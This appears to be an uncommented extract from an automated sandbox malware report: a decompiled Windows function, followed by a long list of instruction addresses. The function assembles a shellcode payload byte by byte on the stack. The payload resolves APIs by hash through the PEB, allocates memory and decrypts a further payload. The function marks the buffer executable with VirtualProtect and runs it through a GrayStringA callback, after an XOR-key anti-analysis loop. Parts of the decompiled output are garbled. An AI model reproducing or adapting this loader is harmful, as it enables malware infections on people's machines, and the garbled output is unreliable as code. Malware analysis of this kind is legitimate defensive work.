                            C-Code - Quality: 100%
                            			E008B1670(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				_Unknown_base(*)() _v624;
				struct HWND__* _v628;
				struct HWND__** _v632;
				char _v636;
				struct HWND__* _v640;
				long _v644;
				void* _v1644;
				void* _t768;

				_v624 = 0xe9;
				_v623 = 0xcc;
				_v622 = 0;
				_v621 = 0;
				_v620 = 0;
				_v619 = 0x55;
				_v618 = 0x8b;
				_v617 = 0xec;
				_v616 = 0x56;
				_v615 = 0x8b;
				_v614 = 0x75;
				_v613 = 8;
				_v612 = 0xba;
				_v611 = 0x2e;
				_v610 = 4;
				_v609 = 0;
				_v608 = 0;
				_v607 = 0x57;
				_v606 = 0xeb;
				_v605 = 0xe;
				_v604 = 0x8b;
				_v603 = 0xca;
				_v602 = 0xd1;
				_v601 = 0xe8;
				_v600 = 0xc1;
				_v599 = 0xe1;
				_v598 = 7;
				_v597 = 0x46;
				_v596 = 0xb;
				_v595 = 0xc8;
				_v594 = 3;
				_v593 = 0xcf;
				_v592 = 3;
				_v591 = 0xd1;
				_v590 = 0xf;
				_v589 = 0xbe;
				_v588 = 0x3e;
				_v587 = 0x8b;
				_v586 = 0xc2;
				_v585 = 0x85;
				_v584 = 0xff;
				_v583 = 0x75;
				_v582 = 0xe9;
				_v581 = 0x5f;
				_v580 = 0x5e;
				_v579 = 0x5d;
				_v578 = 0xc3;
				_v577 = 0x55;
				_v576 = 0x8b;
				_v575 = 0xec;
				_v574 = 0x83;
				_v573 = 0xec;
				_v572 = 0x1c;
				_v571 = 0x83;
				_v570 = 0x65;
				_v569 = 0xfc;
				_v568 = 0;
				_v567 = 0x8b;
				_v566 = 0x45;
				_v565 = 8;
				_v564 = 0x89;
				_v563 = 0x45;
				_v562 = 0xf4;
				_v561 = 0x8b;
				_v560 = 0x45;
				_v559 = 0xf4;
				_v558 = 0x8b;
				_v557 = 0x4d;
				_v556 = 8;
				_v555 = 3;
				_v554 = 0x48;
				_v553 = 0x3c;
				_v552 = 0x89;
				_v551 = 0x4d;
				_v550 = 0xf0;
				_v549 = 0x6a;
				_v548 = 8;
				_v547 = 0x58;
				_v546 = 0x6b;
				_v545 = 0xc0;
				_v544 = 0;
				_v543 = 0x8b;
				_v542 = 0x4d;
				_v541 = 0xf0;
				_v540 = 0x8b;
				_v539 = 0x55;
				_v538 = 8;
				_v537 = 3;
				_v536 = 0x54;
				_v535 = 1;
				_v534 = 0x78;
				_v533 = 0x89;
				_v532 = 0x55;
				_v531 = 0xf8;
				_v530 = 0x8b;
				_v529 = 0x45;
				_v528 = 0xf8;
				_v527 = 0x8b;
				_v526 = 0x4d;
				_v525 = 8;
				_v524 = 3;
				_v523 = 0x48;
				_v522 = 0x20;
				_v521 = 0x89;
				_v520 = 0x4d;
				_v519 = 0xec;
				_v518 = 0x8b;
				_v517 = 0x45;
				_v516 = 0xf8;
				_v515 = 0x8b;
				_v514 = 0x4d;
				_v513 = 8;
				_v512 = 3;
				_v511 = 0x48;
				_v510 = 0x1c;
				_v509 = 0x89;
				_v508 = 0x4d;
				_v507 = 0xe4;
				_v506 = 0x8b;
				_v505 = 0x45;
				_v504 = 0xf8;
				_v503 = 0x8b;
				_v502 = 0x4d;
				_v501 = 8;
				_v500 = 3;
				_v499 = 0x48;
				_v498 = 0x24;
				_v497 = 0x89;
				_v496 = 0x4d;
				_v495 = 0xe8;
				_v494 = 0x83;
				_v493 = 0x65;
				_v492 = 0xfc;
				_v491 = 0;
				_v490 = 0xeb;
				_v489 = 7;
				_v488 = 0x8b;
				_v487 = 0x45;
				_v486 = 0xfc;
				_v485 = 0x40;
				_v484 = 0x89;
				_v483 = 0x45;
				_v482 = 0xfc;
				_v481 = 0x8b;
				_v480 = 0x45;
				_v479 = 0xf8;
				_v478 = 0x8b;
				_v477 = 0x4d;
				_v476 = 0xfc;
				_v475 = 0x3b;
				_v474 = 0x48;
				_v473 = 0x18;
				_v472 = 0x73;
				_v471 = 0x31;
				_v470 = 0x8b;
				_v469 = 0x45;
				_v468 = 0xfc;
				_v467 = 0x8b;
				_v466 = 0x4d;
				_v465 = 0xec;
				_v464 = 0x8b;
				_v463 = 0x55;
				_v462 = 8;
				_v461 = 3;
				_v460 = 0x14;
				_v459 = 0x81;
				_v458 = 0x52;
				_v457 = 0xe8;
				_v456 = 0x59;
				_v455 = 0xff;
				_v454 = 0xff;
				_v453 = 0xff;
				_v452 = 0x59;
				_v451 = 0x3b;
				_v450 = 0x45;
				_v449 = 0xc;
				_v448 = 0x75;
				_v447 = 0x17;
				_v446 = 0x8b;
				_v445 = 0x45;
				_v444 = 0xfc;
				_v443 = 0x8b;
				_v442 = 0x4d;
				_v441 = 0xe8;
				_v440 = 0xf;
				_v439 = 0xb7;
				_v438 = 4;
				_v437 = 0x41;
				_v436 = 0x8b;
				_v435 = 0x4d;
				_v434 = 0xe4;
				_v433 = 0x8b;
				_v432 = 0x55;
				_v431 = 8;
				_v430 = 3;
				_v429 = 0x14;
				_v428 = 0x81;
				_v427 = 0x8b;
				_v426 = 0xc2;
				_v425 = 0xeb;
				_v424 = 4;
				_v423 = 0xeb;
				_v422 = 0xbd;
				_v421 = 0x33;
				_v420 = 0xc0;
				_v419 = 0x8b;
				_v418 = 0xe5;
				_v417 = 0x5d;
				_v416 = 0xc3;
				_v415 = 0x55;
				_v414 = 0x8b;
				_v413 = 0xec;
				_v412 = 0x83;
				_v411 = 0xec;
				_v410 = 0x14;
				_v409 = 0x53;
				_v408 = 0x56;
				_v407 = 0x57;
				_v406 = 0x6a;
				_v405 = 0x4f;
				_v404 = 0x5e;
				_v403 = 0x6a;
				_v402 = 0x5a;
				_v401 = 0x5a;
				_v400 = 0x6a;
				_v399 = 0x58;
				_v398 = 0x59;
				_v397 = 0x33;
				_v396 = 0xc0;
				_v395 = 0x66;
				_v394 = 0x89;
				_v393 = 0x75;
				_v392 = 0xf4;
				_v391 = 0x66;
				_v390 = 0x89;
				_v389 = 0x55;
				_v388 = 0xf6;
				_v387 = 0x66;
				_v386 = 0x89;
				_v385 = 0x4d;
				_v384 = 0xf8;
				_v383 = 0x66;
				_v382 = 0x89;
				_v381 = 0x45;
				_v380 = 0xfa;
				_v379 = 0x66;
				_v378 = 0x89;
				_v377 = 0x75;
				_v376 = 0xec;
				_v375 = 0x66;
				_v374 = 0x89;
				_v373 = 0x55;
				_v372 = 0xee;
				_v371 = 0x66;
				_v370 = 0x89;
				_v369 = 0x4d;
				_v368 = 0xf0;
				_v367 = 0x66;
				_v366 = 0x89;
				_v365 = 0x45;
				_v364 = 0xf2;
				_v363 = 0x64;
				_v362 = 0xa1;
				_v361 = 0x30;
				_v360 = 0;
				_v359 = 0;
				_v358 = 0;
				_v357 = 0x8b;
				_v356 = 0x40;
				_v355 = 0xc;
				_v354 = 0x8b;
				_v353 = 0x40;
				_v352 = 0xc;
				_v351 = 0x8b;
				_v350 = 0;
				_v349 = 0x8b;
				_v348 = 0;
				_v347 = 0x8b;
				_v346 = 0x40;
				_v345 = 0x18;
				_v344 = 0x8b;
				_v343 = 0xf0;
				_v342 = 0x68;
				_v341 = 0x8b;
				_v340 = 0xff;
				_v339 = 0xf6;
				_v338 = 0x4e;
				_v337 = 0x56;
				_v336 = 0xe8;
				_v335 = 0xa;
				_v334 = 0xff;
				_v333 = 0xff;
				_v332 = 0xff;
				_v331 = 0x68;
				_v330 = 0xdd;
				_v329 = 0x12;
				_v328 = 0xef;
				_v327 = 0x24;
				_v326 = 0x56;
				_v325 = 0x8b;
				_v324 = 0xd8;
				_v323 = 0xe8;
				_v322 = 0xfd;
				_v321 = 0xfe;
				_v320 = 0xff;
				_v319 = 0xff;
				_v318 = 0x68;
				_v317 = 0x48;
				_v316 = 0x1c;
				_v315 = 0xdf;
				_v314 = 0x3c;
				_v313 = 0x56;
				_v312 = 0x8b;
				_v311 = 0xf8;
				_v310 = 0xe8;
				_v309 = 0xf0;
				_v308 = 0xfe;
				_v307 = 0xff;
				_v306 = 0xff;
				_v305 = 0x83;
				_v304 = 0xc4;
				_v303 = 0x18;
				_v302 = 0x8b;
				_v301 = 0xf0;
				_v300 = 0x6a;
				_v299 = 4;
				_v298 = 0x68;
				_v297 = 0;
				_v296 = 0x30;
				_v295 = 0;
				_v294 = 0;
				_v293 = 0x68;
				_v292 = 0xb8;
				_v291 = 0x64;
				_v290 = 3;
				_v289 = 0;
				_v288 = 0x6a;
				_v287 = 0;
				_v286 = 0xff;
				_v285 = 0xd3;
				_v284 = 0x89;
				_v283 = 0x45;
				_v282 = 0xfc;
				_v281 = 0x8d;
				_v280 = 0x45;
				_v279 = 0xf4;
				_v278 = 0x50;
				_v277 = 0x8d;
				_v276 = 0x45;
				_v275 = 0xec;
				_v274 = 0x50;
				_v273 = 0x6a;
				_v272 = 0;
				_v271 = 0xff;
				_v270 = 0xd7;
				_v269 = 0x50;
				_v268 = 0x33;
				_v267 = 0xff;
				_v266 = 0x57;
				_v265 = 0xff;
				_v264 = 0xd6;
				_v263 = 0x68;
				_v262 = 0xb8;
				_v261 = 0x64;
				_v260 = 3;
				_v259 = 0;
				_v258 = 0x50;
				_v257 = 0xff;
				_v256 = 0x75;
				_v255 = 0xfc;
				_v254 = 0xe8;
				_v253 = 0xb6;
				_v252 = 0;
				_v251 = 0;
				_v250 = 0;
				_v249 = 0x83;
				_v248 = 0xc4;
				_v247 = 0xc;
				_v246 = 0x6a;
				_v245 = 0x40;
				_v244 = 0x68;
				_v243 = 0;
				_v242 = 0x30;
				_v241 = 0;
				_v240 = 0;
				_v239 = 0x68;
				_v238 = 0x9b;
				_v237 = 0x14;
				_v236 = 0;
				_v235 = 0;
				_v234 = 0x57;
				_v233 = 0xff;
				_v232 = 0xd3;
				_v231 = 0x6a;
				_v230 = 4;
				_v229 = 0x68;
				_v228 = 0;
				_v227 = 0x30;
				_v226 = 0;
				_v225 = 0;
				_v224 = 0x68;
				_v223 = 0x1d;
				_v222 = 0x50;
				_v221 = 3;
				_v220 = 0;
				_v219 = 0x57;
				_v218 = 0x8b;
				_v217 = 0xf0;
				_v216 = 0xff;
				_v215 = 0xd3;
				_v214 = 0x8b;
				_v213 = 0x5d;
				_v212 = 0xfc;
				_v211 = 0x8b;
				_v210 = 0xf8;
				_v209 = 0x68;
				_v208 = 0x9b;
				_v207 = 0x14;
				_v206 = 0;
				_v205 = 0;
				_v204 = 0x53;
				_v203 = 0x56;
				_v202 = 0xe8;
				_v201 = 0x82;
				_v200 = 0;
				_v199 = 0;
				_v198 = 0;
				_v197 = 0x83;
				_v196 = 0xc4;
				_v195 = 0xc;
				_v194 = 0x33;
				_v193 = 0xd2;
				_v192 = 0x8a;
				_v191 = 0xc;
				_v190 = 0x32;
				_v189 = 0xb0;
				_v188 = 0xd;
				_v187 = 0x80;
				_v186 = 0xe9;
				_v185 = 0x22;
				_v184 = 0x80;
				_v183 = 0xf1;
				_v182 = 0x6a;
				_v181 = 0x2a;
				_v180 = 0xca;
				_v179 = 0x80;
				_v178 = 0xe9;
				_v177 = 0x7f;
				_v176 = 0xc0;
				_v175 = 0xc1;
				_v174 = 2;
				_v173 = 0x2a;
				_v172 = 0xca;
				_v171 = 0x80;
				_v170 = 0xf1;
				_v169 = 0xcd;
				_v168 = 2;
				_v167 = 0xca;
				_v166 = 0xd0;
				_v165 = 0xc1;
				_v164 = 0x80;
				_v163 = 0xf1;
				_v162 = 0x22;
				_v161 = 0x80;
				_v160 = 0xe9;
				_v159 = 7;
				_v158 = 0x32;
				_v157 = 0xca;
				_v156 = 2;
				_v155 = 0xca;
				_v154 = 0xf6;
				_v153 = 0xd9;
				_v152 = 0x32;
				_v151 = 0xca;
				_v150 = 0x80;
				_v149 = 0xf1;
				_v148 = 0x49;
				_v147 = 0x2a;
				_v146 = 0xca;
				_v145 = 0x32;
				_v144 = 0xca;
				_v143 = 0xc0;
				_v142 = 0xc1;
				_v141 = 3;
				_v140 = 0x2a;
				_v139 = 0xc1;
				_v138 = 0x32;
				_v137 = 0xc2;
				_v136 = 4;
				_v135 = 0x4b;
				_v134 = 0xc0;
				_v133 = 0xc8;
				_v132 = 2;
				_v131 = 0x2a;
				_v130 = 0xc2;
				_v129 = 0xc0;
				_v128 = 0xc0;
				_v127 = 2;
				_v126 = 2;
				_v125 = 0xc2;
				_v124 = 0x32;
				_v123 = 0xc2;
				_v122 = 2;
				_v121 = 0xc2;
				_v120 = 0x32;
				_v119 = 0xc2;
				_v118 = 4;
				_v117 = 0x61;
				_v116 = 0xf6;
				_v115 = 0xd0;
				_v114 = 2;
				_v113 = 0xc2;
				_v112 = 0x32;
				_v111 = 0xc2;
				_v110 = 0x88;
				_v109 = 4;
				_v108 = 0x32;
				_v107 = 0x42;
				_v106 = 0x81;
				_v105 = 0xfa;
				_v104 = 0x9b;
				_v103 = 0x14;
				_v102 = 0;
				_v101 = 0;
				_v100 = 0x72;
				_v99 = 0xa2;
				_v98 = 0x68;
				_v97 = 0x1d;
				_v96 = 0x50;
				_v95 = 3;
				_v94 = 0;
				_v93 = 0x8d;
				_v92 = 0x83;
				_v91 = 0x9b;
				_v90 = 0x14;
				_v89 = 0;
				_v88 = 0;
				_v87 = 0x50;
				_v86 = 0x57;
				_v85 = 0xe8;
				_v84 = 0xd;
				_v83 = 0;
				_v82 = 0;
				_v81 = 0;
				_v80 = 0x57;
				_v79 = 0xff;
				_v78 = 0xd6;
				_v77 = 0x83;
				_v76 = 0xc4;
				_v75 = 0x10;
				_v74 = 0x5f;
				_v73 = 0x5e;
				_v72 = 0x5b;
				_v71 = 0x8b;
				_v70 = 0xe5;
				_v69 = 0x5d;
				_v68 = 0xc3;
				_v67 = 0x55;
				_v66 = 0x8b;
				_v65 = 0xec;
				_v64 = 0x8b;
				_v63 = 0x55;
				_v62 = 0x10;
				_v61 = 0x85;
				_v60 = 0xd2;
				_v59 = 0x74;
				_v58 = 0x15;
				_v57 = 0x8b;
				_v56 = 0x4d;
				_v55 = 8;
				_v54 = 0x56;
				_v53 = 0x8b;
				_v52 = 0x75;
				_v51 = 0xc;
				_v50 = 0x2b;
				_v49 = 0xf1;
				_v48 = 0x8a;
				_v47 = 4;
				_v46 = 0xe;
				_v45 = 0x88;
				_v44 = 1;
				_v43 = 0x41;
				_v42 = 0x83;
				_v41 = 0xea;
				_v40 = 1;
				_v39 = 0x75;
				_v38 = 0xf5;
				_v37 = 0x5e;
				_v36 = 0x5d;
				_v35 = 0xc3;
				_v34 = 0;
				_v33 = 0;
				_v32 = 0;
				_v31 = 0;
				_v636 = 0xa;
				_v632 =  &_v636;
				_v24 = 0x3b;
				_v23 = 0x2d;
				_v22 = 0x19;
				_v21 = 0x72;
				_v20 = 0x73;
				_v628 = 0;
				_v640 = 0;
				while(1) {
					 *(_t768 + 0xfffffffffffffff4) = 0xf;
					 *(_t768 + 0xbadba1) = 0x1f;
					 *(_t768 + 0xbadba1) = 0x2d;
					 *(_t768 + 0xfffffffffffffff7) = 0x46;
					 *(_t768 + 0xbadba1) = 0x41;
					_v632 =  &_v628;
					_v28 = 0;
					while(_v28 < 5) {
						 *(_t768 + _v28 - 0xc) =  *(_t768 + _v28 - 0xc) & 0x000000ff ^  *(_v632 + _v28 % 3);
						_v28 = _v28 + 1;
					}
					if(( *(_t768 + 0xffffffffffffffec) & 0x000000ff) == ( *(_t768 + 0xfffffffffffffff4) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff) || ( *(_t768 + 0xffffffffffffffef) & 0x000000ff) == ( *(_t768 + 0xfffffffffffffff7) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff)) {
						VirtualProtect( &_v624, 0x252, 0x40,  &_v644); // executed
						GrayStringA(GetDC(0), 0,  &_v624,  &_v1644, 0, 0, 0, 0, 0); // executed
						MessageBoxW(0, 0, 0, 0);
						_v8 = 1;
						while(_v8 < _a4) {
							if(lstrcmpiW( *(_a8 + _v8 * 4), L"/k") == 0 || lstrcmpiW( *(_a8 + _v8 * 4), L"-k") == 0) {
								_v8 = _v8 + 1;
								if(_v8 < _a4) {
									if(E008B15A0( *(_a8 + _v8 * 4)) != 0) {
										_v8 = _v8 + 1;
										continue;
									}
									return 0;
								}
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						_v628 =  &(_v628->i);
						continue;
					}
				}
			}



































































































































































































































































































































































































































































































































































































































                            0x008b1679
                            0x008b1680
                            0x008b1687
                            0x008b168e
                            0x008b1695
                            0x008b169c
                            0x008b16a3
                            0x008b16aa
                            0x008b16b1
                            0x008b16b8
                            0x008b16bf
                            0x008b16c6
                            0x008b16cd
                            0x008b16d4
                            0x008b16db
                            0x008b16e2
                            0x008b16e9
                            0x008b16f0
                            0x008b16f7
                            0x008b16fe
                            0x008b1705
                            0x008b170c
                            0x008b1713
                            0x008b171a
                            0x008b1721
                            0x008b1728
                            0x008b172f
                            0x008b1736
                            0x008b173d
                            0x008b1744
                            0x008b174b
                            0x008b1752
                            0x008b1759
                            0x008b1760
                            0x008b1767
                            0x008b176e
                            0x008b1775
                            0x008b177c
                            0x008b1783
                            0x008b178a
                            0x008b1791
                            0x008b1798
                            0x008b179f
                            0x008b17a6
                            0x008b17ad
                            0x008b17b4
                            0x008b17bb
                            0x008b17c2
                            0x008b17c9
                            0x008b17d0
                            0x008b17d7
                            0x008b17de
                            0x008b17e5
                            0x008b17ec
                            0x008b17f3
                            0x008b17fa
                            0x008b1801
                            0x008b1808
                            0x008b180f
                            0x008b1816
                            0x008b181d
                            0x008b1824
                            0x008b182b
                            0x008b1832
                            0x008b1839
                            0x008b1840
                            0x008b1847
                            0x008b184e
                            0x008b1855
                            0x008b185c
                            0x008b1863
                            0x008b186a
                            0x008b1871
                            0x008b1878
                            0x008b187f
                            0x008b1886
                            0x008b188d
                            0x008b1894
                            0x008b189b
                            0x008b18a2
                            0x008b18a9
                            0x008b18b0
                            0x008b18b7
                            0x008b18be
                            0x008b18c5
                            0x008b18cc
                            0x008b18d3
                            0x008b18da
                            0x008b18e1
                            0x008b18e8
                            0x008b18ef
                            0x008b18f6
                            0x008b18fd
                            0x008b1904
                            0x008b190b
                            0x008b1912
                            0x008b1919
                            0x008b1920
                            0x008b1927
                            0x008b192e
                            0x008b1935
                            0x008b193c
                            0x008b1943
                            0x008b194a
                            0x008b1951
                            0x008b1958
                            0x008b195f
                            0x008b1966
                            0x008b196d
                            0x008b1974
                            0x008b197b
                            0x008b1982
                            0x008b1989
                            0x008b1990
                            0x008b1997
                            0x008b199e
                            0x008b19a5
                            0x008b19ac
                            0x008b19b3
                            0x008b19ba
                            0x008b19c1
                            0x008b19c8
                            0x008b19cf
                            0x008b19d6
                            0x008b19dd
                            0x008b19e4
                            0x008b19eb
                            0x008b19f2
                            0x008b19f9
                            0x008b1a00
                            0x008b1a07
                            0x008b1a0e
                            0x008b1a15
                            0x008b1a1c
                            0x008b1a23
                            0x008b1a2a
                            0x008b1a31
                            0x008b1a38
                            0x008b1a3f
                            0x008b1a46
                            0x008b1a4d
                            0x008b1a54
                            0x008b1a5b
                            0x008b1a62
                            0x008b1a69
                            0x008b1a70
                            0x008b1a77
                            0x008b1a7e
                            0x008b1a85
                            0x008b1a8c
                            0x008b1a93
                            0x008b1a9a
                            0x008b1aa1
                            0x008b1aa8
                            0x008b1aaf
                            0x008b1ab6
                            0x008b1abd
                            0x008b1ac4
                            0x008b1acb
                            0x008b1ad2
                            0x008b1ad9
                            0x008b1ae0
                            0x008b1ae7
                            0x008b1aee
                            0x008b1af5
                            0x008b1afc
                            0x008b1b03
                            0x008b1b0a
                            0x008b1b11
                            0x008b1b18
                            0x008b1b1f
                            0x008b1b26
                            0x008b1b2d
                            0x008b1b34
                            0x008b1b3b
                            0x008b1b42
                            0x008b1b49
                            0x008b1b50
                            0x008b1b57
                            0x008b1b5e
                            0x008b1b65
                            0x008b1b6c
                            0x008b1b73
                            0x008b1b7a
                            0x008b1b81
                            0x008b1b88
                            0x008b1b8f
                            0x008b1b96
                            0x008b1b9d
                            0x008b1ba4
                            0x008b1bab
                            0x008b1bb2
                            0x008b1bb9
                            0x008b1bc0
                            0x008b1bc7
                            0x008b1bce
                            0x008b1bd5
                            0x008b1bdc
                            0x008b1be3
                            0x008b1bea
                            0x008b1bf1
                            0x008b1bf8
                            0x008b1bff
                            0x008b1c06
                            0x008b1c0d
                            0x008b1c14
                            0x008b1c1b
                            0x008b1c22
                            0x008b1c29
                            0x008b1c30
                            0x008b1c37
                            0x008b1c3e
                            0x008b1c45
                            0x008b1c4c
                            0x008b1c53
                            0x008b1c5a
                            0x008b1c61
                            0x008b1c68
                            0x008b1c6f
                            0x008b1c76
                            0x008b1c7d
                            0x008b1c84
                            0x008b1c8b
                            0x008b1c92
                            0x008b1c99
                            0x008b1ca0
                            0x008b1ca7
                            0x008b1cae
                            0x008b1cb5
                            0x008b1cbc
                            0x008b1cc3
                            0x008b1cca
                            0x008b1cd1
                            0x008b1cd8
                            0x008b1cdf
                            0x008b1ce6
                            0x008b1ced
                            0x008b1cf4
                            0x008b1cfb
                            0x008b1d02
                            0x008b1d09
                            0x008b1d10
                            0x008b1d17
                            0x008b1d1e
                            0x008b1d25
                            0x008b1d2c
